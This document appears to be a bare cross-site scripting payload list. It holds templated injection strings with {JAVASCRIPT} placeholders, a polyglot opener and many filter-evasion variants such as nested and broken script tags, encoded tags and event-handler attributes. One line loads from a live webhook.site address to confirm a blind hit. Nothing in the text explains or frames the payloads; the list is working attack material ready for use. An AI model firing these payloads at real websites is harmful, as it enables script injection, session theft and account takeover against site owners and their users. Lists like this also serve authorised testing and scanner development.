
ava/script:"/*`/*\`/*"/*\"/*-/*);/*<!--></script></style></textarea></template></noscript></noembed></select>--><<svg/autofocus/onload=/*confirm(/shahmibro/.source)/*/c=confirm,c({PAYLOAD})//
";{JAVASCRIPT}//
';a=prompt,a()//
"onclick={JAVASCRIPT}>"@x.y
"onclick={JAVASCRIPT}><svg/onload={JAVASCRIPT}>"@x.y
<image/src/onerror={JAVASCRIPT}>
<img/src/onerror={JAVASCRIPT}>
<image src/onerror={JAVASCRIPT}>
<img src/onerror={JAVASCRIPT}>
<image src =q onerror={JAVASCRIPT}>
<img src =q onerror={JAVASCRIPT}>
</scrip</script>t><img src =q onerror={JAVASCRIPT}>
<svg onload={JAVASCRIPT}>
"><svg onload={JAVASCRIPT}//
"onmouseover={JAVASCRIPT}//
"autofocus/onfocus={JAVASCRIPT}//
'-{JAVASCRIPT}-'
'-{JAVASCRIPT}//
\'-{JAVASCRIPT}//
< img//////src=https://webhook.site/bc5f9f62-9936-46c9-8649-e745d8f62562 oNIY=1 style="display:none;" oNerror={JAVASCRIPT}//
<svg onmouseover={JAVASCRIPT}>.svg
1vu3ay<script>JAVASCRIPT<%2fscript>ou72f
admintest%22%3e%3cscript%3e{JAVASCRIPT}%3c%2fscript%3etest
Test1<script>{JAVASCRIPT}</script>Test1
Test\" onmouseover=\"{JAVASCRIPT}\" style=display:block>
%3Cscript%3E{JAVASCRIPT}%3C%2fscript%3E
<p><img src=\'x\' onerror={JAVASCRIPT}></p>
“&gt;&lt;img src=x onerror={JAVASCRIPT}&gt;
<script>{JAVASCRIPT}</script>
<scr ipt>{JAVASCRIPT}</scr ipt>
"><script>{JAVASCRIPT}</script>
"><script>{JAVASCRIPT}</script><"
'><script>{JAVASCRIPT}</script>
'><script>{JAVASCRIPT}</script><'
<SCRIPT>{JAVASCRIPT};</SCRIPT>
<scri<script>pt>{JAVASCRIPT};</scr</script>ipt>
<SCRI<script>PT>{JAVASCRIPT};</SCR</script>IPT>
<scri<scr<script>ipt>pt>{JAVASCRIPT};</scr</sc</script>ript>ipt>
";{JAVASCRIPT};"
';{JAVASCRIPT};'
;{JAVASCRIPT};
{JAVASCRIPT};
<SCR%00IPT>{JAVASCRIPT}</SCR%00IPT>
\";{JAVASCRIPT};//
<STYLE TYPE="text/javascript">{JAVASCRIPT};</STYLE>
<<SCRIPT>{JAVASCRIPT}//<</SCRIPT>
"{EVENTHANDLER}={JAVASCRIPT} 
<<SCRIPT>{JAVASCRIPT}//<</SCRIPT>
<img src="1" onerror="{JAVASCRIPT}">
<img src='1' onerror='{JAVASCRIPT}'
onerror="{JAVASCRIPT}"
onerror='{JAVASCRIPT}'
onload="{JAVASCRIPT}"
onload='{JAVASCRIPT}'
<IMG """><SCRIPT>{JAVASCRIPT}</SCRIPT>">
<IMG '''><SCRIPT>{JAVASCRIPT}</SCRIPT>'>
"""><SCRIPT>{JAVASCRIPT}
'''><SCRIPT>{JAVASCRIPT}'
<IFRAME SRC='f' onerror="{JAVASCRIPT}"></IFRAME>
<IFRAME SRC='f' onerror='{JAVASCRIPT}'></IFRAME>
"><img/src/style=html:url("data:,"><svg/onload={JAVASCRIPT}>")>
'><img/src/style=html:url("data:,"><svg/onload={JAVASCRIPT}>")>